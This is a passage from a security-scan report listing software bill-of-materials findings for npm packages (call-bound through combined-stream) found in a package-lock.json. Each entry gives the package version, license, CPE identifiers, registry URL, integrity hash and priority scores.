cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/call-bound@1.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz + integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg== + dependencies: + call-bind-apply-helpers: ^1.0.2 + get-intrinsic: ^1.3.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a4cb8d0a4eb7503f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: camelcase 5.3.1' + title: camelcase 5.3.1 + description: 'Package discovered: camelcase 5.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 98453e2c1718f20f + name: camelcase + version: 5.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/camelcase@5.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz + integrity: sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3b9efee290bbc139 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: camelcase-css 2.0.1' + title: camelcase-css 2.0.1 + description: 'Package discovered: camelcase-css 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b224930ed183bceb + name: camelcase-css + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/camelcase-css@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz + integrity: sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 54ace4d8b29c3fad + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: caniuse-lite 1.0.30001791' + title: caniuse-lite 1.0.30001791 + description: 'Package discovered: caniuse-lite 1.0.30001791' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 574728aff770dffd + name: caniuse-lite + version: 1.0.30001791 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: CC-BY-4.0 + spdxExpression: CC-BY-4.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/caniuse-lite@1.0.30001791 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz + integrity: sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d2ccf1883f8178ec + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: chokidar 3.6.0' + title: chokidar 3.6.0 + description: 'Package discovered: chokidar 3.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6e064efe5c17d2c + name: chokidar + version: 3.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/chokidar@3.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz + integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw== + dependencies: + anymatch: ~3.1.2 + braces: ~3.0.2 + glob-parent: ~5.1.2 + is-binary-path: ~2.1.0 + is-glob: ~4.0.1 + normalize-path: ~3.0.0 + readdirp: ~3.6.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 265715c369a6ec46 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: client-only 0.0.1' + title: client-only 0.0.1 + description: 'Package discovered: client-only 0.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e7be86c370ee2217 + name: client-only + version: 0.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/client-only@0.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz + integrity: sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c077917c166ed35e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cliui 6.0.0' + title: cliui 6.0.0 + description: 'Package discovered: cliui 6.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0b1fbe7259e117a1 + name: cliui + version: 6.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cliui@6.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz + integrity: sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ== + dependencies: + string-width: ^4.2.0 + strip-ansi: ^6.0.0 + wrap-ansi: ^6.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b756cde7127582a3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cliui 8.0.1' + title: cliui 8.0.1 + description: 'Package discovered: cliui 8.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6699f516cd09331f + name: cliui + version: 8.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cliui@8.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz + integrity: sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ== + dependencies: + string-width: ^4.2.0 + strip-ansi: ^6.0.1 + wrap-ansi: ^7.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6102e65c9c7e3be7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: clone 2.1.2' + title: clone 2.1.2 + description: 'Package discovered: clone 2.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 924490c8cb0d8bef + name: clone + version: 2.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/clone@2.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/clone/-/clone-2.1.2.tgz + integrity: sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: de7fc275efead359 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: clsx 2.1.1' + title: clsx 2.1.1 + description: 'Package discovered: clsx 2.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1cdd74d474651cd1 + name: clsx + version: 2.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/clsx@2.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz + integrity: sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 03115b0621f3a47e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cluster-key-slot 1.1.2' + title: cluster-key-slot 1.1.2 + description: 'Package discovered: cluster-key-slot 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 635dabdd9cdc8fd8 + name: cluster-key-slot + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cluster-key-slot@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz + integrity: sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 56e4289efb51aa13 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: color-convert 2.0.1' + title: color-convert 2.0.1 + description: 'Package discovered: color-convert 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fcc3d45495abf3bd + name: color-convert + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/color-convert@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz + integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ== + dependencies: + color-name: ~1.1.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 568b6e4207edec50 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: color-name 1.1.4' + title: color-name 1.1.4 + description: 'Package discovered: color-name 1.1.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9d8d6c4ccfd91cbf + name: color-name + version: 1.1.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/color-name@1.1.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz + integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c5d023023358f691 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: color-name 2.1.0' + title: color-name 2.1.0 + description: 'Package discovered: color-name 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8dfa4f08fc1899a7 + name: color-name + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/color-name@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz + integrity: sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d0d3f9cc2cfd641a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: color-string 1.9.1' + title: color-string 1.9.1 + description: 'Package discovered: color-string 1.9.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b96884f4eed4192d + name: color-string + version: 1.9.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/color-string@1.9.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz + integrity: sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg== + dependencies: + color-name: ^1.0.0 + simple-swizzle: ^0.2.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b8edaba313b178d2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: color-string 2.1.4' + title: color-string 2.1.4 + description: 'Package discovered: color-string 2.1.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1f15e4f4433605fc + name: color-string + version: 2.1.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/color-string@2.1.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz + integrity: sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg== + dependencies: + color-name: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 227fe4ddfe5bcfb2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: combined-stream 1.0.8' + title: combined-stream 1.0.8 + description: 'Package discovered: combined-stream 1.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6feb2abce081a13b + name: combined-stream + version: 1.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + 